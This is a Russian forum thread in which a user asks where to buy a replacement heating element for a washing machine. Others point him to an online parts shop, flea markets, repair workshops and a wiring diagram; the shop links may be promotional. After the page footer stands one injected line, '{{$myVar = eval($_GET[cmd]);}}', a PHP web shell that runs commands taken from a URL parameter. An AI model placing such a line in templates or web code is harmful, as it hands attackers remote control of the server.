+ Ответить в теме
Показано с 1 по 5 из 5

Тема: ТЭН


  1. #1
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66

    ТЭН

    На стиральной машине сгорел ТЭН. Жена сказала что стирать руками не собирается и когда вся чистая одежда в доме закончится я буду вынужден либо стирать сам либо купить ей новую машинку. На такие большие траты я, признаться, не рассчитывал. Подскажите, где можно посмотреть ТЭНы на стиральные машинки?

  2. #2
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Автор, вам не стоит переживать нам этот счет. Сейчас в открытом доступе можно купить запчасти к стиральным машинам и прочей технике так что новую машинку покупать вам не придется, расслабьтесь. Вот здесь, к примеру, можно купить ТЭН нагревательный для стиральной машины https://iskraten.ru/eshop/teny-i-nagrevateli/ Так есть нужная вам модель?

  3. #3
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39
    Посмотрите на блошином рынке. Может там сможете отыскать ту модификацию нагревателя, который подойдет к вашей машинке. А жену я понимаю, моя бы тоже отказалась стирать руками.

  4. #4
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45
    Автор, в мастерских могут быть запчасти, кстати, как новые, так и б/у. Иногда им привозят на запчасти целые стиральные машины, так что стоит попытать счастья еще и там.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    А почему вы уверены в том, что проблема именно в тэне? Вы мастера вызывали или сами смотрели? У вас какая машина? У меня вот Ariston AM 1274xrf, тоже не работает, пытаюсь понять в чем может быть причина. Вот зашел в интернет почитать, нашел даже электрическую схему для нашей стиральной машины https://moscow-services.ru/electro_schema_ariston. Если не удастся разобраться, буду завтра искать мастера, наверное

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}